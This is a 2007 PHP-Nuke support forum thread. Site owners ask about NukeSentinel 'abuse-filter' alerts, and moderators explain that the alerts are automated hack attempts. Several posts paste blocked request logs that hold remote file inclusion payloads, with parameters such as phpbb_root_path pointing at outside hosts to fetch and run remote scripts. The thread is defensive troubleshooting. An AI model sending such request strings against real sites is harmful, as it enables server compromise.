Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> RN NukeSentinel(tm) issues
Author Message
esttecb
Hangin' Around



Joined: Mar 14, 2007
Posts: 37

PostPosted: Tue Oct 16, 2007 12:26 pm Reply with quote

Hi, I'm taking a lot of abuse-filter attemps. It's a hacking attemp, really? or I can disable this filter? and what is it exactly?

Thank's
 
View user's profile Send private message
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Tue Oct 16, 2007 1:02 pm Reply with quote

It sounds like Sentinel may be doing its job, but we need a bit more information.

Can you post some of the information that NS is giving you when this occurs.
 
View user's profile Send private message
esttecb







PostPosted: Tue Oct 16, 2007 2:59 pm Reply with quote

I'm using NukeSentinel(tm) 2.5.13 and this is happening when... I don't know.. The NS is sending E-mails to my account like this:

Quote:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)Query String: www.mywebsite/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=http://www.alonsaunet.com/webmaster/romi/jirudog/Get String: www..mywebsite/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=http://www.alonsaunet.com/webmaster/romi/jirudog/Post String: www.mywebsite/modules.phpForwarded For: noneClient IP: noneRemote Address: 71.226.78.xxxRemote Port: 2159Request Method: GET


or this:

Quote:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)Query String: www.mywebsite.com/modules.php?name=Surveys&op=results&pollID=http://www.high-five.at/_fanclub/_resources/ezu/ocibi/&mode=thread&order=0&thold=0Get String: www.mywebsite.com/modules.php?name=Surveys&op=results&pollID=http://www.high-five.at/_fanclub/_resources/ezu/ocibi/&mode=thread&order=0&thold=0Post String: www.mywebsite.com/modules.phpForwarded For: 127.0.0.1Client IP: noneRemote Address: 61.178.57.xxxRemote Port: 16939Request Method: GET


thank's
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Oct 16, 2007 3:11 pm Reply with quote

Yes those are just more hack attempts. You should leave the filtering options in Sentinel on. Although all these vulnerabilities are already patched, Sentinel will protect you from many more.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona

PostPosted: Wed Oct 17, 2007 5:37 am Reply with quote

And another way of looking at this too is that if these guys are trying these older exploits (so sounds like "script kiddies" to me), then you don't really want them anywhere near your site anyways. So ban away...

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
esttecb







PostPosted: Thu Oct 18, 2007 10:51 am Reply with quote

Yes, but I'm giving a lot of IPs banned (four or five per day) and all with "http://mywebsite.com/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=http://www.somwebesite.com" (the FAQ module) so I think this isn't a real hack attempt. But if you say "Yeah! It's a hack attempt" I'll think this too.
Ok, thank's

Cyas
 
Gremmie
Former Moderator in Good Standing



Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Thu Oct 18, 2007 11:32 am Reply with quote

It is a hack attempt. They are trying to get your PHP-Nuke software to execute a script located on another remote server. That remote script undoubtedly does very bad things to the right PHP-Nuke version.

_________________
Only registered users can see links on this board! Get registered or login! - An Event Calendar for PHP-Nuke
Only registered users can see links on this board! Get registered or login! - A Google Maps Nuke Module 
View user's profile Send private message
evaders99







PostPosted: Thu Oct 18, 2007 3:37 pm Reply with quote

It's called "automated bots" Smile
 
safierdrgn
Hangin' Around



Joined: Oct 23, 2006
Posts: 26

PostPosted: Thu Nov 22, 2007 9:35 pm Reply with quote

Oh good I found a thread that answered my question! I got 4 of these today..and I'm happy that I have Sentinel!



User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Query String: www.xxxxxxxxxx.com/modules.php?name=Web_Links
&l_op=MostPopular
&ratenum=1
&ratetype=http://www.service-exposants.com/store/punotag/ufacip/

Get String: www.xxxxxxxxxx.com/modules.php?name=Web_Links
&l_op=MostPopular
&ratenum=1
&ratetype=http://www.service-exposants.com/store/punotag/ufacip/

Post String: www.xxxxxxxxxx.com/modules.php
 
View user's profile Send private message
montego







PostPosted: Sun Nov 25, 2007 10:54 am Reply with quote

To Bob, Raven and many others who have had their hands in NukeSentinel:

worship
 
bobbyg
Worker
Worker



Joined: Dec 05, 2007
Posts: 212
Location: Tampa, Florida

PostPosted: Sun Dec 23, 2007 9:43 pm Reply with quote

User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.Cool Gecko/20051111 Firefox/1.5
Query String: www.mysite/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://spam1999.sytes.net/test.txt??05b04f40
Get String: www.mysite/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=http://spam1999.sytes.net/test.txt??05b04f40
Post String: www.mysite/modules/Forums/admin/admin_ug_auth.php

Query String: www.mysite/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.vincent-prado.com/blog/wp.rss.txt???4fafddb0
Get String: www.mysite/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.vincent-prado.com/blog/wp.rss.txt???4fafddb0
Post String: www.mysite/modules/Forums/admin/admin_db_utilities.php

These 2 were stopped by Sentinel -- It blocked the IP's after the Post String -- or as a result of the combined 3 query, get, post. However, my question is why did Sentinel permit the query and get strings. I did not have forum activated and I do not have moderators so nothing was shown.
 
View user's profile Send private message Visit poster's website
Gremmie







PostPosted: Sun Dec 23, 2007 9:54 pm Reply with quote

I'm confused by your question. Sentinel did not permit anything, it blocked them.
 
bobbyg







PostPosted: Sun Dec 23, 2007 10:17 pm Reply with quote

Your right it did block them, that I know. However, you can do the query and the get and not get blocked. But if you do all 3 then you will get blocked. The problem could be that information can be obtained through the query and get statements.
 
Gremmie







PostPosted: Sun Dec 23, 2007 11:54 pm Reply with quote

I'm not sure I follow you. Sentinel is just providing a dump of all info it had available to it when it did the block. It isn't showing you 3 separate things that happened.
 
bobbyg







PostPosted: Mon Dec 24, 2007 12:24 am Reply with quote

You are looking at it like Sentinel is looking at it. All 3 commands are issued back to back automatically. However, open up a browser and copy the query or the get command against your site and see if information can be retrieved by a single command. By the way a single command of the query or a single command of the get will not be blocked by Sentinel.
 
warren-the-ape
Worker
Worker



Joined: Nov 19, 2007
Posts: 196
Location: Netherlands

PostPosted: Mon Dec 24, 2007 7:46 am Reply with quote

Hey just the thread i was looking for Cool

montego wrote:
And another way of looking at this too is that if these guys are trying these older exploits (so sounds like "script kiddies" to me), then you don't really want them anywhere near your site anyways. So ban away...


Hmm, an user at our website was blocked cause he used html-tags in his post (he wasnt aware that this wasnt possible) but got blocked for Reason: Abuse-Script but I guess this is part of the; Scripting Blocker Settings?

I did notice a big difference between the nmbr of shameful hackers on your site (Montego) and Raven's but thats probably cause you are blocking those 'hacking attempts' and Raven dont?


And are those sites in those queries compromised? Cause some of them look pretty innocent Razz

Edit: got 23 blocked filter abuses within 3 days Shocked
 
View user's profile Send private message
montego







PostPosted: Mon Dec 24, 2007 7:57 am Reply with quote

Quote:

I did notice a big difference between the nmbr of shameful hackers on your site (Montego) and Raven's but thats probably cause you are blocking those 'hacking attempts' and Raven dont?


No, that is not the reason. Raven is more "forgiving" than I am. killing me Just kidding. What I really mean is that he, on occasion, will clear all his blocks. It has been a long time since I've done that because I have added a lot of manual blocks due to another script that I have which notifies me of certain "things".

Quote:

And are those sites in those queries compromised? Cause some of them look pretty innocent


They are absolutely NOT "innocent". Anything which attacks phpbb_root_path is far from innocent and I will not go into the explanation of why. phpBB has since plugged this particular hole (yes, RN has that "plug"), so these are old exploits. Just remember too that just because a file has .txt as an extension does not mean that is truly what the nature of the file is. It could even be PHP script or a binary etc. To answer your question, it is very possible that those sites were hacked and now being used to try and attack others.
 
warren-the-ape







PostPosted: Mon Dec 24, 2007 8:05 am Reply with quote

Yep can understand that it needs a bit of caution when you entered a nmbr of bans manually. But a lot of those abuse-filter blocks are pretty unique, in that they try once and never come back.


Thnx for the thorough explanation montego Cool Didnt know that those .txt queries could be 'disguised' in some way.
But does php-nuke even has that 'phpbb_root_path' ? Thought it was nuke_bb* ?

montego wrote:
To answer your question, it is very possible that those sites were hacked and now being used to try and attack others.


Aah okay, yes thats indeed what i ment to say Very Happy

I got 3 blocks all from the same IP > some Chinese apple sirop company killing me
 
montego







PostPosted: Mon Dec 24, 2007 8:19 am Reply with quote

phpBB is integrated into PHP-Nuke, so, yes, that path is in there.
 
Gremmie







PostPosted: Mon Dec 24, 2007 11:25 am Reply with quote

bobbyg wrote:
You are looking at it like Sentinel is looking at it. All 3 commands are issued back to back automatically. However, open up a browser and copy the query or the get command against your site and see if information can be retrieved by a single command. By the way a single command of the query or a single command of the get will not be blocked by Sentinel.


No, there aren't 3 commands. Sentinel is just showing you the contents of the get query string and the post query string at the time of the block. It will block if either is bad.

Are you sure you aren't logged in as admin when you copy / paste the string?
 
Gremmie







PostPosted: Mon Dec 24, 2007 12:57 pm Reply with quote

If you log completely out of admin, clearing cookies if you have to, and copy/paste that string into your browser and you don't get a block then something is wrong. (Just be prepared to clear your IP out of .htacess, if applicable, and Sentinel's table if you attempt this).
 
bobbyg







PostPosted: Mon Dec 24, 2007 5:42 pm Reply with quote

Gremmie wrote:
If you log completely out of admin, clearing cookies if you have to, and copy/paste that string into your browser and you don't get a block then something is wrong. (Just be prepared to clear your IP out of .htacess, if applicable, and Sentinel's table if you attempt this).


I was logged in under admin when I first tried that and I got the list of moderators (which I have none). I made sure I was completely logged out and tried again. I got a "white page" and ip was added to the blocked ip database. It did not put in the .htaccess though.
 
FireATST
RavenNuke(tm) Development Team



Joined: Jun 12, 2004
Posts: 654
Location: Ohio

PostPosted: Mon Dec 24, 2007 6:37 pm Reply with quote

Under your blocker settings in NukeSentinel do you have it set to write to the htaccess?
 
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number
bobbyg







PostPosted: Mon Dec 24, 2007 6:57 pm Reply with quote

FireATST wrote:
Under your blocker settings in NukeSentinel do you have it set to write to the htaccess?


Any time I am on the site and do something that causes an ip ban it logs the ip in both the database and the .htaccess.
 
FireATST







PostPosted: Tue Dec 25, 2007 9:17 am Reply with quote

Ok, that is why I asked if you had it setup in NukeSentinel under the blocker configuration settings to automatically write the blocked ip into the htaccess file? There is a check box under the blocker settings that if you check it, it writes the ip also to the htaccess file.
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> RN NukeSentinel(tm) issues

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©